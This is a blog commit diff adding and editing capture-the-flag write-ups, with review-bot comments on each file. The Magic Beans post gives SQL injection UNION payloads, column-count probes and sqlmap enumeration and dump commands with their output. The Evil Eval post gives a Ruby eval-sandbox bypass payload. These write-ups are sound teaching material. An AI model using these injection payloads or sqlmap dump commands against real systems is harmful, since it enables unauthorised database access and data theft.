I finally wrote a writeup yay
javadhamidi committed Aug 11, 2023
1 parent 63c7030 commit db013e1
Showing 5 changed files with 158 additions and 11 deletions.
10 changes: 5 additions & 5 deletions content/posts/2022/uactf/blurry-eyed.md
@@ -10,14 +10,14 @@ categories:
- misc
---

Based on the description, you may have determined that we are dealing with an [autostereogram](https://en.wikipedia.org/wiki/Autostereogram), better known as a [magic eye](https://en.wikipedia.org/wiki/Magic_Eye) puzzle. As such, theoretically you can just stare at the picture with great intensity until the flag reveals itself to you. If you did manage to solve this challenge only with your eyes then you are amazing. Discerning simple shapes are difficult, let alone a short sentence.
Based on the description, you may have determined that we are dealing with an [autostereogram](https://en.wikipedia.org/wiki/Autostereogram), better known as a [magic eye](https://en.wikipedia.org/wiki/Magic_Eye) puzzle. As such, you can theoretically just stare at the picture with great intensity until the flag reveals itself to you. If you did manage to solve this challenge with only your eyes then you are amazing. Discerning simple shapes is difficult, let alone a short sentence.

If you are a mere mortal, an alternative way to solve this challenge is to use any number of the online sterogram solving tools that exist ([this one's](http://magiceye.ecksdee.co.uk/) pretty good). Alternatively you can open up GIMP and put the image on two layers. Then set the blending mode of the top layer to 'difference' and drag the top layer along the horizontal axis until you get something like this:
If you are a mere mortal, an alternative way to solve this challenge is to use any of the online stereogram-solving tools that exist ([this one's](http://magiceye.ecksdee.co.uk/) pretty good). Alternatively, you can open up GIMP and put the image on two layers. Then set the blending mode of the top layer to 'difference' and drag the top layer along the horizontal axis until you get something like this:

![Gimp Decoded Image](decoded.png)
![Gimp Decoded Image](./assets/decoded.png)

Regardless of what solution you use, the shape of the letters should bear resemblance to the original image, shown below.
Regardless of what solution you use, the shape of the letters should bear a resemblance to the original image, shown below.

![Original Text](original.png)
![Original Text](./assets/original.png)

**Flag:** `UACTF{r34l17y_1n_3d}`
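Review bot: the two image references now point at `./assets/decoded.png` and `./assets/original.png`, but the commit's file list shows only the five markdown files, so confirm the images were actually moved into `content/posts/2022/uactf/assets/` (here or in an earlier commit); otherwise both pictures break on the rendered post. The wording fixes ('Discerning simple shapes is difficult', 'any of the online stereogram-solving tools') are correct. One small point: the magiceye.ecksdee.co.uk link is plain `http://`; if the site serves HTTPS, prefer that form.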
8 changes: 4 additions & 4 deletions content/posts/2022/uactf/colour-blind.md
@@ -10,13 +10,13 @@ categories:
- forensics
---

While running the image through stegsolve/stegonline or manipulating the pixels in your favourite image editor won't work, a hex editor should show you that the data portion of the bitmap contains more than two distinct hex values. Checking the image properties should also indicate that `ishihara.bmp` is a 16 color bitmap image, and as such, each individual hex value denotes a different colour. Hence, we know that the image contains a wider range colours than are being shown. To figure out why we can't see them, let's explore the [bitmap file format](https://en.wikipedia.org/wiki/BMP_file_format) a bit further by annotating the raw bytes of our challenge file. Note that the bytes highlighted in grey below denote the data portion of the file.
While running the image through stegsolve/stegonline or manipulating the pixels in your favourite image editor won't work, a hex editor should show you that the data portion of the bitmap contains more than two distinct hex values. Checking the image properties should also indicate that `ishihara.bmp` is a 16-color bitmap image, and as such, each hex value denotes a different colour. Hence, we know that the image contains a wider range of colours than are being shown. To figure out why we can't see them, let's explore the [bitmap file format](https://en.wikipedia.org/wiki/BMP_file_format) a bit further by annotating the raw bytes of our challenge file. Note that the bytes highlighted in grey below denote the data portion of the file.

![Annotated Bitmap Header](bitmap_hex_annotated.png)
![Annotated Bitmap Header](./assets/bitmap_hex_annotated.png)

The challenge description and title are collectively intended to hint at checking the bitmap image file's 'color table'. Indeed, if we look at the bytes of the file above, you might notice that 15 of the 16 colours in our colour table have the same value. Altering these values to make them more distinct (hint: these are just typical hex colours in little-endian). That said, there are a lot of paths to figuring out this challenge, and one of the easiest is to simply transplant the header of a working 16 color bitmap onto the challenge file. If you do you'll probably get something close to the original, which is included below:
The challenge description and title are collectively intended to hint at checking the bitmap image file's 'color table'. Indeed, if we look at the bytes of the file above, you might notice that 15 of the 16 colours in our colour table have the same value. Altering these values to make them more distinct (hint: these are just typical hex colours in little-endian). That said, there are a lot of paths to figuring out this challenge, and one of the easiest is to simply transplant the header of a working 16-color bitmap onto the challenge file. If you do you'll probably get something close to the original, which is included below:

![Original Image](original.bmp)
![Original Image](./assets/original.bmp)

Thanks to Francisco Couzo for the use of their [Ishihara Plate Generator](https://franciscouzo.github.io/ishihara/).

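Review bot: 'Altering these values to make them more distinct (hint: these are just typical hex colours in little-endian).' is still a sentence fragment in the new version; give it a main clause, e.g. 'Altering these values to make them more distinct reveals the hidden plate (hint: ...)'. The hint itself could be made concrete: in a 16-colour BMP each colour-table entry is four bytes in blue, green, red, reserved order, which is what 'hex colours in little-endian' amounts to, so stating that byte order outright saves the reader guessing. Spelling is also mixed within the paragraph ('16-color', 'color table', 'colour table', 'colours'); settle on one variant, keeping 'color table' only where it quotes the format's own field name.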
37 changes: 37 additions & 0 deletions content/posts/2022/uactf/evil-eval.md
@@ -0,0 +1,37 @@
---
layout: post
title: Evil Eval - UACTF 2022
date: 2022-08-07T00:00:00.000Z
description: Made a cool internet calculator for all your maths needs. Well, some of your maths needs.
author: javad
categories:
- ctf
- write-ups
- pwn
---

Trying a variety of inputs over netcat, you'll quickly discover two key pieces of information from the error messages:

1. The characters 'f', 'l', 'a', 'g', '.', 't', 'x', 't', and '`' are all blocked
2. Our input can't have more than eight distinct characters

We can infer that our goal is something to the effect of making a system call like `cat flag.txt` in eight or fewer characters. Looking through [Ruby's pre-defined variables](https://ruby-doc.org/docs/ruby-doc-bundle/Manual/man-1.4/variable.html), we can see that `$"` denotes a long list of module names (loaded by require) which we can potentially character index and frankenstein together to write out "flag.txt" in relatively few distinct characters, like so:

```
f -> $"[11+1+1+1][11+11+11]
l -> $"[1+1+1][1+1+1+1]
a -> $"[1+1][1]
g -> $"[11][11+11+1+1]
. -> $"[1][1+1+1+1+1+1]
t -> $"[1+1][1+1]
x -> $"[1+1+1][1+1+1+1+1+1]
t -> $"[1+1][1+1]
```

The next step is to get Ruby to print the contents of this file. One trick is to pass `ARGV << flag.txt`, which will cause our ruby script to call itself, passing the evaluated contents of `flag.txt` to itself, exposing the flag. Of course, this requires two many distinct characters, but by referring back to our trusty pre-defined variables, we see that the much shorter `$*` is an alias to `ARGV`. Putting all this information, we can create the following 'payload' to expose the flag:

```
$*<<$"[11+1+1+1][11+11+11]+$"[1+1+1][1+1+1+1]+$"[1+1][1]+$"[11][11+11+1+1]+$"[1][1+1+1+1+1+1]+$"[1+1][1+1]+$"[1+1+1][1+1+1+1+1+1]+$"[1+1][1+1]
```

**Flag:** `UACTF{8u7_53210u51y_d0n7_3v41}`
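Review bot: 'this requires two many distinct characters' should read 'too many', and 'Putting all this information, we can create' is missing 'together'. The mechanism in the same paragraph deserves one more sentence: 'cause our ruby script to call itself' does not say what reads the file, since `$* << "flag.txt"` only appends a filename to ARGV, so name which part of the calculator consumes ARGV and ends up echoing the contents of `flag.txt`. Related wording: 'making a system call like `cat flag.txt`' mixes terms (that is a shell command, and the final payload never runs one), and in prose the value should be quoted, `ARGV << "flag.txt"`, as the payload effectively builds. Lastly, the `$"` indices in the table depend on the load order on the challenge server, which is worth stating so readers do not expect the same indices locally, and the linked predefined-variables page is the Ruby 1.4 manual; a current doc link would serve better.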
4 changes: 2 additions & 2 deletions content/posts/2022/uactf/nontextual-troubles.md
@@ -10,7 +10,7 @@ categories:
- crypto
---

It turn out that in Python 3, attempting to write non-ASCII characters to a file without using 'binary mode' (a mode which deals with 'non-textual data', hence the name of the challenge) has some less-than ideal results. Indeed, if you tried providing your own plain-text to `xor.py` you might have noticed that there are somehow more bytes in the cipher-text after XORing that you started with in your plaintext. Ultimately, it appears that the `write.write(ciphertext)` function is prepending either 0xc2 or 0xc3 to certain bytes. Simply adding a condition to exclude these, and providing the cipher-text as the input (since XOR is the inverse of itself) will provide a simple solution to this puzzle.
It turns out that in Python 3, attempting to write non-ASCII characters to a file without using 'binary mode' (a mode which deals with 'non-textual data', hence the name of the challenge) has some less-than-ideal results. Indeed, if you tried providing your plain text to `xor.py` you might have noticed that there are somehow more bytes in the cypher-text after XORing that you started with in your plaintext. Ultimately, it appears that the `write.write(ciphertext)` function is prepending either 0xc2 or 0xc3 to certain bytes. Simply adding a condition to exclude these, and providing the cipher-text as the input (since XOR is the inverse of itself) will provide a simple solution to this puzzle.

```py
from random import seed, randrange
@@ -30,4 +30,4 @@ with open("plaintext.txt", 'r') as read, open("ciphertext.txt", 'w') as write:
write.write(ciphertext)
```

**Flag**: `UACTF{b4d_h4b175_l34d_70_py7h0n2}`
**Flag**: `UACTF{b4d_h4b175_l34d_70_py7h0n2}`
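Review bot: the edited paragraph now says 'cypher-text' while the following sentence and the code keep 'cipher-text' and `ciphertext`; use 'ciphertext' throughout. 'more bytes in the ... after XORing that you started with' should be 'than you started with' (present in both old and new). The explanation would also benefit from naming the cause: writing a `str` in text mode encodes it as UTF-8, so every character in the U+0080 to U+00FF range becomes two bytes with a 0xC2 or 0xC3 lead byte, which is the 'prepending' observed. That matters for the proposed fix: a condition that merely drops 0xC2/0xC3 bytes recovers the original value only for the 0xC2 group; for characters U+00C0 to U+00FF the remaining continuation byte is 0x40 below the original, so decoding the file as UTF-8 (reading it in text mode) or opening both files in binary mode is the correct inverse. Worth checking that the solution script handles that case rather than relying on the flag happening to avoid it.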
110 changes: 110 additions & 0 deletions content/posts/2023/duckctf/magic-beans.md
@@ -0,0 +1,110 @@
---
layout: post
title: Magic Beans - DuckCTF 2023
date: 2023-08-11T00:00:00.000Z
description: Hidden beneath this strange jelly bean themed website is a flag; a flag hidden within a table aptly named Flag, and sprinkled letter-by-letter along single character columns titled 'a', 'b', 'c', 'd', ...
author: javad
categories:
- ctf
- write-ups
- web
---

We're presented with a largely static, single-page site - save for one input field that doesn't seem to be processed on the client side. The challenge description also draws special attention to 'columns' and 'tables'. Given that there aren't any HTML tables in the source, instinct says this might involve a database.

If we try a classic single-quote injection (`'`) we see the quote suspiciously disappear. Adding on both a semi-colon to terminate the SQL statement and a comment afterwards (`'; -- `) we see that vanish as well! Clearly, the backend is handling this input differently from regular text.

We know from the challenge description that we need to read from a table called Flag (in the database). A good way is to tack this on to the input we're already getting (all the delicious beans) using a UNION attack. This is where some googling and trial-and-error comes in to craft just the right payload. Here's what we came up with:

```sql
' UNION ALL SELECT a, b, c, d, e FROM Flag; --
```
Be aware that there is some **input validation on the client side**! Submitting certain characters or too many characters may not work. Instead, try making the POST request using a tool like [Insomnia](https://insomnia.rest/) or [Postman](https://www.postman.com/).
Some notable observations about this payload:
- Make sure to have a space after the comment (` -- `), injection is finicky.
- We use `UNION ALL SELECT` instead of `UNION SELECT`, just to make sure that no duplicate rows are removed (although that's unlikely in this situation).
- We know which columns and tables to we want thanks to info from the challenge description.
- We only select five columns (`a, b, c, d, e`), since a `UNION SELECT` will only work if the number of columns appended matches the number we're already getting. Any more or any less will give us 'No results found.' indicating our payload failed.
A good way to figure out the number of columns we need to `UNION SELECT` is to test each of the following statements, one at a time, until one works. One of these statements should succeed, even if we don't know the names of the columns/table.

```
' UNION ALL SELECT NULL --
' UNION ALL SELECT NULL,NULL --
' UNION ALL SELECT NULL,NULL,NULL --
' UNION ALL SELECT NULL,NULL,NULL,NULL --
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL --
...
```
Our functioning payload from before should give us a new bean entry at the very bottom, with the letters 'u', 'a', 'c', visible (part of the flag format `quack{}`). Nice! Rotating through the alphabet of course could give us the flag, but that seems rather tedious. Instead, we can concatenate all the columns in the table Flag in a payload like this:
```sql
~' UNION ALL SELECT NULL, CONCAT(a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w), NULL, NULL, NULL FROM Flag; --
```

Some trial-and-error tells us that columns a-w are valid. Substituting the concatenated columns into the second union-selected column instead of the first will show the flag where the bean name would usually be (in nice big letters). Adding a tilde at the beginning (`~`) is just to clear out all other search results (since none of the bean names includes a `~`).

**Flag**: `quack{J3lly_83lly_ru5H}`

## Using sqlmap

While we can totally craft our own payloads, using an automated tool can be far easier. [Sqlmap](https://sqlmap.org/) is awesome, and allows us to solve this challenge without any of the hints given in the challenge description.

Let's take this from the top. First, let's check if injection is possible. The following command specifies the URL, the form data (which is one search parameter), and states that we are making a POST request.

```
sqlmap -u "http://chall.duckctf.com:8080/index.php" --data "search=*" -p "search" --method POST
```

The output tells us injection is possible! We can now add on `--dbs` to get the names of all databases.

```bash
sqlmap -u "http://chall.duckctf.com:8080/index.php" --data "search=*" -p "search" --method POST --dbs
```
```
...
available databases [2]:
[*] beantome
[*] information_schema
```

Other than the usual 'information_schema', 'beantome' is the only database of interest. Let's see what tables are inside ...

```bash
sqlmap -u "http://chall.duckctf.com:8080/index.php" --data "search=*" -p "search" --method POST --tables -D beantome
```
```
...
Database: beantome
[2 tables]
+-------+
| Beans |
| Flag |
+-------+
```

Hmm, two interesting tables. I'm guessing that all our delicious bean flavours are inside 'Beans' so let's turn our attention and dump the contents of 'Flag'.

```bash
sqlmap -u "http://chall.duckctf.com:8080/index.php" --data "search=*" -p "search" --method POST --dump -T Flag -D beantome
```
```
...
Database: beantome
Table: Flag
[1 entry]
+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
| a | b | c | d | e | f | g | h | i | j | k | l | m | n | o | p | q | r | s | t | u | v | w |
+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
| q | u | a | c | k | { | J | 3 | l | l | y | _ | 8 | 3 | l | l | y | _ | r | u | 5 | H | } |
+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
```

**Flag**: `quack{J3lly_83lly_ru5H}`
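Review bot: markdown structure first: the bullet list under 'Some notable observations about this payload:' has no blank line before it (it follows the closing fence directly) and the paragraph 'A good way to figure out the number of columns...' has no blank line after the last bullet, so kramdown/Jekyll will fold that paragraph into the final list item; likewise the `sql` fence after 'Rotating through the alphabet' needs a blank line before it. Typo: 'which columns and tables to we want' should be 'which columns and table we want'. The 'injection is finicky' remark has a concrete reason worth stating: in MySQL/MariaDB (which the `CONCAT` and `information_schema` output point to) the `-- ` comment is only recognised when followed by whitespace, which is also why the column-count probes end in `-- ` with a trailing space. Consistency: the first sqlmap block is an untagged fence while the later ones are tagged `bash`. Minor: `--method POST` is redundant once `--data` is supplied, since sqlmap already uses POST for a request with a body; harmless, but worth trimming or noting.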
